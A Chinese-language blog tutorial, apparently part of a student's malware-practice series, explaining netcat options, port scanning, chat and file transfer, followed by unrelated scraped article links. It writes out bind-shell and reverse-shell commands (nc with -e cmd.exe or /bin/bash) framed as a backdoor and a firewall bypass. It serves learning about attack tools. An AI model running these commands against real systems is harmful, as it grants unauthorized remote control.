计算机病毒实践汇总四:netcat使用方法
在尝试学习分析的过程中,判断结论不一定准确,只是一些我自己的思考和探索。敬请批评指正!
1. netcat概述
(1)特性
“TCP/IP协议栈瑞士军刀”,可以被用在支持端口扫描、隧道、代理、端口转发等的对外连接上。
从标准输入得到数据进行网络传输,它得到的数据可以通过标准输出显示到屏幕上。
连接模式下,作为一个客户端:
nc [-options] hostname [ports]
监听模式下,充当一个服务器:
nc -l -p port [-options] [hostname] [port]
(2)常用参数
| options | 描述 |
|---|---|
| -d | 无命令行界面,使用后台模式 |
| -e [prog] | 程序重定向 |
| -g [gateway] | 源路由跳跃点, 不超过8 |
| -G [num] | 源路由指示器: 4, 8, 12, ... |
| -h | 获取帮助信息 |
| -i [secs] | 延时设置,端口扫描时使用 |
| -l | 监听知道NetCat被结束(可断开重连) |
| -L | 无命令行界面,使用后台模式 |
| -n | 以数字形式表示的IP地址 |
| -o [file] | 使进制记录 |
| -p [port] | 打开本地端口 |
| -r | 随机本地和远程的端口 |
| -s [addr] | 本地源地址 |
| -t | 以TELNET的形式应答入站请求 |
| -u | UDP 模式 |
| -v/-vv | 显示详细信息 |
| -w [secs] | 连接超时设置 |
| -z | I/O 模式(扫描时使用) |
2. 简单命令
- 可以将nc.exe所在目录放进Path中,方便调用
(1)作为客户端
nc -v [ip] [port]
- 扫瞄某IP的某个端口,返回信息详细输出。
nc -v -z [ip] [port]-[port]
扫描某IP的端口到某端口,返回信息详细输出,但扫描速度较慢
使用netcat可以进行端口扫描。但是Netcat并不是这个工作的最佳工具,可以使用一个更高级的工具:nmap。
nc -nvv [ip] [port]
- 连接到某ip主机的指定端口(需开放)。
(2)作为服务器
nc -l -p 80
- 开启本机的TCP的80端口并监听。
3. 使用netcat实现特定功能
(1)聊天功能
双方一个做服务器,一个做客户端。
服务器首先开启一个端口进行监听:
nc -l -p [port]
然后客户端进行连接:
nc [服务器ip] [port]
此时,双方的输入都会显示在对方机器上:
服务器端:

客户端:

(2)文件传输
双方一个做服务器,一个做客户端。
在服务器上创建并且重定向netcat的输入为待传输文件hyqServer.txt,那么当任何成功连接到该端口,netcat会发送文件内容。
nc -l -p [port] < [待发送文件名]

在客户端我们重定向输出到hyqClient.txt,当连接到服务器端时,服务器端发送文件内容,客户端保存文件内容到当前目录下的指定文件中。
nc -n [服务器ip] [port] > [待保存文件名]

比较两个文件:


由于服务器端使用Linux操作系统,服务器端使用Windows操作系统,对于换行符的解释不通,导致格式不同。但内容没有更改,是完整的。
(3)打开一个Shell
实际上,Netcat更多的用于后门程序。
WinXP作为服务器,开启监听80端口,并选用-v显示详细信息, –e选项指向cmd.exe程序。
nc -lv -p [port] -e cmd.exe
若为Linux系统,可以写做:
nc -lv -p [port] -e /bin/bash
此时,只要有人在所监听的80端口上建立连接,该程序都将执行,并将输出传输出去,即开启了一个后门。

我们可以在kali(作为客户端)中使用IP和相应端口连接WinXP,成功后可以看到输入变成了cmd的模式:
nc -vv [ip] [port]

可以查看到WinXP的目录:

可以进行删除操作:

删除netcat文件夹中的Readme.txt文件:

在WinXP中查看,确实被删除了:

(4)反向Shell
反向shell是指在客户端打开的shell,可以用来绕过防火墙的限制。
使用kali作为服务端打开端口监听:
nc -l -p [port]
WinXP作为客户端打开相同的端口并将程序重定向到命令行:
nc [ip] [port] -e cmd.exe
若客户端为Linux系统,则:
nc [ip] [port] -e /bin/bash
在客户端显示连接上了开放端口5317:

此时,Linux中会反弹回客户端的shell,并可进行操作:

4. 小结
- 本来是病毒实践用于尝试分析的工具,虽然没有深度使用这个工具,但是我觉得这个工具本身的功能很多,如果结合自己编写的脚本应该会更能体现其价值。
- nc是麻雀虽小,五脏俱全,这一特点有好处,也有不足。它优势在于对没有更高要求的简单环境中可以实现多功能。劣势在于每一方面的功能其实都有相应的专门的软件,而这些专门的软件做的比它的功能更强大和深入,就比如端口扫描,我觉得它的性能就不如nmap。
参考资料
参考资料1:NetCat使用介绍
参考资料2:nc 高级使用教程简介
参考资料3:Linux系统中使用netcat命令的奇技淫巧
参考资料4:NetCat代码分析
计算机病毒实践汇总四:netcat使用方法的更多相关文章
- 计算机病毒实践汇总六:IDA Pro基础
在尝试学习分析的过程中,判断结论不一定准确,只是一些我自己的思考和探索.敬请批评指正! 1. IDA使用 (1)搜索.下载并执行IDA Pro,对可执行程序lab05-01.dll进行装载,分别以图形 ...
- 计算机病毒实践汇总二:bufferzone沙盘使用体验
在尝试学习分析的过程中,判断结论不一定准确,只是一些我自己的思考和探索.敬请批评指正! 1. 安装bufferzone及其简单使用 (1)安装BufferZone BufferZone的msi安装文件 ...
- 百度地图和高德地图坐标系的互相转换 四种Sandcastle方法生成c#.net帮助类帮助文档 文档API生成神器SandCastle使用心得 ASP.NET Core
百度地图和高德地图坐标系的互相转换 GPS.谷歌.百度.高德坐标相互转换 一.在进行地图开发过程中,我们一般能接触到以下三种类型的地图坐标系: 1.WGS-84原始坐标系,一般用国际GPS纪录仪记 ...
- Xamarin.Android开发实践(四)
原文:Xamarin.Android开发实践(四) Xamarin.Android下获取与解析JSON 一.新建项目 1.新建一个Android项目,并命名为为NetJsonList 2.右击引用,选 ...
- Android进阶(二十)AndroidAPP开发问题汇总(四)
· Android进阶(二十)AndroidAPP开发问题汇总(四) android:layout_width和android:width的区别 基中的android:layout_width和and ...
- kafka原理和实践(四)spring-kafka消费者源码
系列目录 kafka原理和实践(一)原理:10分钟入门 kafka原理和实践(二)spring-kafka简单实践 kafka原理和实践(三)spring-kafka生产者源码 kafka原理和实践( ...
- App架构师实践指南四之性能优化一
App架构师实践指南四之性能优化一 1.性能维度常见用来衡量App性能的维度如图9-1所示.其中,性能指标包括电池(电量/温度).流量(上行流量/下行流量等).CPU(平均/最大/最小).内存 ...
- #Python编程从入门到实践#第四章笔记
#Python编程从入门到实践#第四章笔记 操作列表 1.遍历列表 使用for循环,遍历values列表 for value in values: print(value) 2.数字列表 使 ...
- Git工程开发实践(四)——Git分支管理策略
A successful Git branching model https://nvie.com/posts/a-successful-git-branching-model/ Git工程开发实践( ...
随机推荐
- EntityFramework 实体映射到数据库
EntityFramework实体映射到数据库 在Entity Framework Code First与数据表之间的映射方式实现: 1.Fluent API映射 通过重写DbContext上的OnM ...
- uva147 Dollars ——完全背包
link:http://uva.onlinejudge.org/index.php?option=com_onlinejudge&Itemid=8&page=show_problem& ...
- Android Studio debug使用release的签名
当我们在做微信微博sdk分享的时候调试非常麻烦,因为要使用对应的签名版本才能调用sdk成功. 当我们使用AndroidStudio的Gradle之后会很简单的解决这个问题. 1.我们把签名文件放到工程 ...
- eclipse 使用(一)单步调试
昨天终于将取数据的流程走通了.但是没有成功获得数据.原因是,把服务器中的数据库还原到了本地.而测试数据是写到了本地.把数据给覆盖了.早上来了之后,赶紧在服务器上把数据弄了一下. 之后开始跑代码. 项目 ...
- Abstract和Virtual和interface , 派生类中重写 override / new关键字
http://www.cnblogs.com/blsong/archive/2010/08/12/1798064.html C#中Abstract和Virtual 在C#的学习中,容易混淆virtua ...
- LVS-DR工作原理图文详解
为了阐述方便,我根据官方原理图另外制作了一幅图,如下图所示:VS/DR的体系结构: 我将结合这幅原理图及具体的实例来讲解一下LVS-DR的原理,包括数据包.数据帧的走向和转换过程. 官方的原理说明:D ...
- UIView常用的一些方法小记之setNeedsDisplay和setNeedsLayout
1,UIView的setNeedsDisplay和setNeedsLayout方法 首先两个方法都是异步执行的.而setNeedsDisplay会调用自动调用drawRect方法,这样可以拿到 UI ...
- 找出linux服务器IO占用高的程序
一台服务器比较性能无外乎内存.cpu使用率.IO使用率,把这3样优化好了,你服务器的负载就要小很多,当然网络情况不在我的考虑范围,毕竟网络这个情况是很不稳定,就算你服务器上把网络优化得再好,idc不 ...
- TCP/UDP的接收包方式
UDP udp不是流式的,每次接收一个包,长度不超过(65535-28,总包长65535字节,包头28字节).所以UDP方式下不需要填写任何参数直接调用 $client->recv() 即可.注 ...
- JVM参数(三)打印所有XX参数及值
本篇文章基于Java 6(update 21oder 21之后)版本, HotSpot JVM 提供给了两个新的参数,在JVM启动后,在命令行中可以输出所有XX参数和值. -XX:+PrintFlag ...